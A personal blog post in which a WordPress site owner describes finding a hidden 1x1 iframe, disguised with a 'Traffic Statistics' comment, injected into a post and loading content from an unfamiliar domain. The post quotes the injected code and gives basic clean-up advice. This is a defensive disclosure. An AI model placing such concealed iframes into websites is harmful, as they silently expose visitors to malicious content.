Today I Google Search for Richard Palace and to my surprise, I found my site, RichardPalace.com, has been identified to contain malicious software. Immediately, I checked with No Script Add-ons for FireFox and discover a domain which is rather unfamiliar. The domain is wp-stats-php.info and I thought the site was related to WordPress correcting some Stats, but it was not. I then checked my site source code for the domain name wp-stats-php and found the following code:
<!– Traffic Statistics –> <iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
This code was inserted on my blog post on 11th Nov 2007 by someone or software. I immediately removed it and asked Google to review my site so as to remove “This site may harm your computer” tag. I am not sure how this iframe code got into my blog. If it happens to me, it can also happen to you.
If you are using wordpress, I suggest you do the following:
1) Upgrade wordpress to the latest version.
2) Change your theme.
3) Check your site source code regularly for “iframe”.
Popularity: 6% [?]
You Should Also Check Out This Post:
- Richard Palace is Back to Make Money Online!
- Obama - Winner of the 2008 US Presidential Election
- Google Released Google Chrome
- PS3 Update 2.42
- Sony PSP-3000 Announced
More Active Posts:
- Just Jean and Simply Jean are the Same Jean? (34)
- Google SiteMap For WordPress MU Plugin 1.513101 (25)
- PS3 Update 2.35 (24)
- Disney Channel Camp Rock at Disney.com/CampRock (15)
- Google Released Google Chrome (10)
- Who Will Win The US Presidential Election? Barack Obama or John McCain? (9)
- PS3 Update 2.36 (8)
- Randy Pausch Death Update (6)
- Dawn Yang - Singapore Hottest Blogger (6)
- Deven Trabosh - Marry a Princess Lost in America (6)































1 User Responded In This Article
Pingback And Trackback To This Post
Leave Your Comment Below